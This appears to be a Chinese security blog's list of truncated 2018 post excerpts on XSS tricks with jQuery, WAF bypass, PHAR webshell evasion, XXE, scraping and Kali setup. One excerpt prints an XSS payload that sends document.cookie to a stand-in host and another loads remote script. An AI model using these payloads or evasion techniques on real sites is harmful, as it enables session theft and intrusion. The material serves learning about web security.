13
2018
12

XSS : 围绕 jQuery Libary 的一些跨站知识点 [补充ing]

当前jQuery版本:v 3.3.1知识点:`//`缺省协议,该协议可以精简payload,或绕过黑名单策略`$.get`方法,发起一个get请求,比如<svg onload="$.get('//127.0.0.1/xss.html',document.cookie)">`$.getScript`方法,远程调用一个js脚本,比如<svg onload="$.getScript('//127.0.0.1/xss.js'
06
2018
11

Python小记:简易爬虫场景中BeautifulSoup4模块中find_all方法的使用笔记

     最近用到了几次BeautifulSoup4模块来爬取一些网站资源,做下笔记。     个人把BeautifulSoup模块理解为python中的一个HTML解析库,分为BeautifulSoup4和BeautifulSoup3,python2.7的用户推荐BeautifulSoup4,直接通过 “pip install BeautifulSoup4”来安装,该模块已被移植到BS4,引用方式如下“from b
29
2018
10

PHP小记:利用 PHAR 完成 PHP webshell 静态免杀

      最近看到某位前辈在玩PHAR,由于其文件构造的特殊性,认为其可以利用起来做PHP WEBSHELL的免杀。     借用一段话“PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么Phar后缀文件是默认开启支持的,你不需要任何其他的安装就可以使用它。”直接上代码:<?php $path='demo.pha
17
2018
10

XSS小记:Javascript 中 eval 与 fetch组合在攻击场景中的使用

         进入正题之前先说说个人理解的进行反射XSS攻击时XSS Platform所起的作用,攻击者构造payload 致使被攻击者访问恶意URL时页面通过script src 的方式引用了XSS Platform上的一个恶意JS文件,该文件的大致内容就是将本地的cookies发送到XSS Platform。         有次
12
2018
04

XSS小记:记一次绕过知道创宇加速乐实现反射XSS的payload

测试网站XSS,时常会碰到搜索框未过滤敏感字符导致反射XSS,大致描述一下漏洞场景:

      1.搜索框的关键词被带入到 URL和页面中

      2.敏感字符(引号/尖括号)完全没有过滤,各种html标签,js事件完全不检测

03
2018
04

XML之Javascript DOM复习以及XXE漏洞的理解

        今天想学习一下XEE(xml实体注入)漏洞,所以先学习了一下xml语法,在菜鸟教程上看了会资料,对xml的一些总结如下:xml 相比 html,前者的作用是存储数据,后者的作用是显示数据;一个xml文档须有根元素(相对其他元素,该元素为父元素);通过Javascript脚本可以通过xml文件获得 XML Document对象来获取xml文件里的数据.     &
26
2018
03

Kali 3 安装PgAdmin 3 GUI

  今天在kali上需要安装PgAdmin 来管理Postgresql数据库,得知:PgAdmin3使用的phtony version为2.7,PgAdmin4的则要求为3.5,(kali默认为2.7)安装方法为先在kali添加公钥,命令如下:     wget --quiet -O - https://www.postgresql.org/media/keys/ACCC4CF8.asc 
19
2018
03

Python简单实现外部参数交互

     看到一些有名的py程序比如Sqlmap,Nmap,都可以很好的实现外部参数交互,比如‘-u’参数制定一个地址,前几天写了一个检测url存活性的脚本,都是通过用 raw_input 函数提示用户输入,这样一步步输入显得比较麻烦,现得知:sys模块里的argv数组能获取外部所有的参数和值,sys.argv[0] 固定存储运行的改脚本名,通过sys.argv[1:]就可以获取用户输入的所有参数和值,这里' : '号表示argv[1]数组